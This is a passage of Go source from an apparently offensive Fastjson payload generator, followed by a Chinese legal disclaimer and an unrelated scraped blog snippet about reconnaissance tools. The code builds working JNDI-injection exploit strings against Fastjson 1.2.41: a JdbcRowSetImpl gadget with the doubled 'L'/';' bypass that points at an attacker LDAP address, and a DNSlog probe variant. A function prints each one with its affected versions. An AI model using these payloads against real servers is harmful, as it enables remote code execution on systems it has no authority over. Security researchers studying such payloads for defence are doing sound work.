	Pal = `{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"ldap://` + Address + `","autoCommit":true}`
	Hep = `JNDI注入-ldap利用链exp,反连,类名前后双写L与;进行绕过`
	Vson = `1.2.41 <= Fastjson < 1.2.42`
	ShowPayload(Pal, Hep, Vson)

	// dnslog variant
	Pal = `{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"dns://poc2.` + dnslog + `","autoCommit":true}`
	Hep = `JNDI注入-DNSlog利用链poc,请求dnslog,类名前后双写L与;进行绕过`
	Vson = `1.2.41 <= Fastjson < 1.2.42`
	ShowPayload(Pal, Hep, Vson)
}

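// ShowPayload prints one collected entry. In list mode (dt == false, i.e.
// --list was given) only the raw payload line is printed. Otherwise the
// entry is numbered with the shared id counter and drawn in a box with its
// description and version note.
//
// str is positional: str[0] is the payload, str[1] the description, str[2]
// the version note. The original indexed all three unconditionally and
// panicked when called with fewer arguments; missing entries are now treated
// as empty strings and a call with no arguments prints nothing. Output for
// the normal three-argument call is unchanged.
func ShowPayload(str ...string) {
	const redColor = "\033[31m"
	const resetColor = "\033[0m"

	if len(str) == 0 {
		return
	}
	payload := str[0]
	var description, versions string
	if len(str) > 1 {
		description = str[1]
	}
	if len(str) > 2 {
		versions = str[2]
	}

	if !dt {
		// List mode: one raw payload per line.
		fmt.Println(payload)
		return
	}

	fmt.Println("┌─────────PayloadID:", id)
	id++ // package-level counter, so numbering continues across builder functions
	fmt.Printf("%s%s%s\n", redColor, payload, resetColor)

	fmt.Println("│\n├───[+]payload说明:")
	fmt.Print("│	")
	fmt.Println(description)

	fmt.Println("│\n├───[+]验证过的版本:")
	fmt.Print("│	")
	fmt.Println(versions)
	fmt.Println("│	注:版本号仅供参考                                        Fastjson SEC──┐")
	// Footer last. The original reached this through a defer placed inside an
	// if block; printing it directly keeps the same output order without the
	// deferred call and without the Println-with-trailing-newline that vet flags.
	fmt.Print("└──────────────────────────────────────────────────────────────────────────────┘\n\n")
}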


相信国家相信党,黑客没有好下场
请遵守相关法律法规,文中技术仅用于有授权的安全测试,禁止用于非法活动!
本文章仅面向拥有合法授权的渗透测试安全人员及进行常规操作的网络运维人员。
在操作的过程中,您应确保自己的所有行为符合当地法律法规,且不得进行违反中国人民共和国相关法律的活动。
作者不承担用户擅自使用相关技术从事任何违法活动所产生的任何责任。


From: https://www.cnblogs.com/Aixve/p/18306568

    信息收集1、谷歌语法:帮助我们更好的检索有用信息https://www.cnblogs.com/wyw-star/p/182930402、域名SubfinderOneforallSubdomain3、敏感目录7kbscan御剑IhoneyBakFileScanModify:git文件扫描4、端口分析1~655351~1w1w~3w3w以上大端口naabuyakitmsscan5......